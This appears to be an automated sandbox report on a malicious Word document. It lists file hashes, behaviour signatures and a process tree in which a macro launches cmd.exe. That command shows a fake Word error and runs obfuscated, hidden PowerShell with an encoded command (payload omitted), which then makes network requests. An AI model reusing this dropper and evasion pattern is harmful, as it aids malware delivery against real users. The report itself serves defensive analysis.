Analysis
-
max time kernel
54s -
max time network
56s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64, arch:x86, image:win7-20241023-en, locale:en-us, os:windows7-x64, system -
submitted
10/11/2024, 22:08
Behavioral task
behavioral1
Sample
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc
Resource
win10v2004-20241007-en
General
-
Target
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc
-
Size
155KB
-
MD5
81be90af006dfe897d3bc7a6f41b2533
-
SHA1
668b325b769e60be1a2cc4e009ba00e498cbb698
-
SHA256
04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912
-
SHA512
a7c483474b78068015263605a4d5f91af1af10c980d363ef3cc57dabcba955526819453f0d346c87fa008daf95371a5d73b21a2f959a2cb4ce050e09bb4d6b10
-
SSDEEP
3072:CzP09JIVOorWcj9ufstRUUKSns8T00JSHUgteMJ8qMD7gMO:CzPkvCj9ufsfgIf0pL9
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description                                                                         pid   pid_target  Process  procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  2968  2824        cmd.exe  31
-
Blocklisted process makes network request 11 IoCs
flow  pid   Process
5     2860  powershell.exe
6     2860  powershell.exe
7     2860  powershell.exe
9     2860  powershell.exe
11    2860  powershell.exe
13    2860  powershell.exe
14    2860  powershell.exe
16    2860  powershell.exe
18    2860  powershell.exe
19    2860  powershell.exe
21    2860  powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid   Process
2860  powershell.exe
-
Drops file in System32 directory 1 IoCs
description                   ioc                                                                                                                                 Process
File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
-
Drops file in Windows directory 1 IoCs
description                   ioc                                Process
File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid   Process
1372  WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid   Process
2860  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description              pid   Process
Token: SeDebugPrivilege  2860  powershell.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid   Process
1372  WINWORD.EXE
1372  WINWORD.EXE
-
Suspicious use of WriteProcessMemory 10 IoCs
description                       pid   Process      procid_target
PID 1372 wrote to memory of 2496  1372  WINWORD.EXE  30
PID 1372 wrote to memory of 2496  1372  WINWORD.EXE  30
PID 1372 wrote to memory of 2496  1372  WINWORD.EXE  30
PID 1372 wrote to memory of 2496  1372  WINWORD.EXE  30
PID 2968 wrote to memory of 2828  2968  cmd.exe      35
PID 2968 wrote to memory of 2828  2968  cmd.exe      35
PID 2968 wrote to memory of 2828  2968  cmd.exe      35
PID 2968 wrote to memory of 2860  2968  cmd.exe      36
PID 2968 wrote to memory of 2860  2968  cmd.exe      36
PID 2968 wrote to memory of 2860  2968  cmd.exe      36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\04062330aac349f5175ccc2cc613ae814fff100077825a82c803636309baf912.doc"
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1372 -
  C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  PID:2496
-
-
C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [base64-encoded PowerShell command omitted]
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2968 -
  C:\Windows\system32\msg.exe
  msg Admin /v Word experienced an error trying to open the file.
  PID:2828
-
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  POwersheLL -w hidden -ENCOD [base64-encoded PowerShell command omitted]
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2860
-